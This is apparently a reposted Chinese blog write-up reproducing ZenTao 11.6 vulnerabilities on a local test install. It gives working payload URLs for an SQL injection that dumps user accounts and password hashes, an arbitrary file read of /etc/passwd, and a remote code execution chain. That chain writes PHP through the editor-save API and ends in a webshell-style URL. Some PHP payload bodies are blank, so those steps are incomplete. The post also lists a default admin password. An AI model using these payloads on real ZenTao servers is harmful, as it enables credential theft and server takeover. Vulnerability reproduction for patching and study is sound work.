禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

禅道全版本rce漏洞复现笔记

漏洞说明

禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理、项目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业项目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。

此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所有的项目都受此漏洞影响。本次漏洞复现以ZenTaoPMS.11.6版本作为演示

环境搭建

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第1张图片

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第2张图片

至此环境搭建成功

漏洞复现

漏洞1 SQL注入

首先我们登录admin/CD87691043cs账户修改默认密码,创建一个普通Test0001/1qaz2wsx3edc!@#$用户并登录

Payload

http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果如下:

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第3张图片

漏洞2 文件读取

Payload

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc访问结果如下:

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第4张图片

由于本地环境是window系统,所以没有回显,我们在xamppzentaomoduleapi目录下新建一个test文件,读取

http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=test

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第5张图片

漏洞3 RCE

利用上面的文件读取来执行命令

Payload1

POST /zentao/api-getModel-editor-save-filePath=1111 HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: lang=zh-cn; device=desktop; theme=default; windowWidth=2426; windowHeight=796; zentaosid=vqruohhgn7qbhveakg04h9e267

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

fileContent=

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第6张图片

先写入一个phpinfo,再读取访问

需要给物理路径加上一层才能包含成功

http://127.0.0.1/zentao/api-getModel-api-getMethod-filePath=1111/1

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第7张图片

Payload2

fileContent=

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第8张图片

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第9张图片

Payload3(一句话)

fileContent=');?>

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第10张图片

这里是window系统,所以写入绝对路径,绝对路径可以同样用fileContent=获取

http://127.0.0.1/zentao/xxx.php.aaa?x=phpinfo();

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记_第11张图片

PS:最好使用linux系统安装,windows不要使用一键安装包安装,windows系统安装集成版的话根目录下的php代码好像做了限制,无法执行。

参考链接

你可能感兴趣的:(禅道linux一键安装漏洞)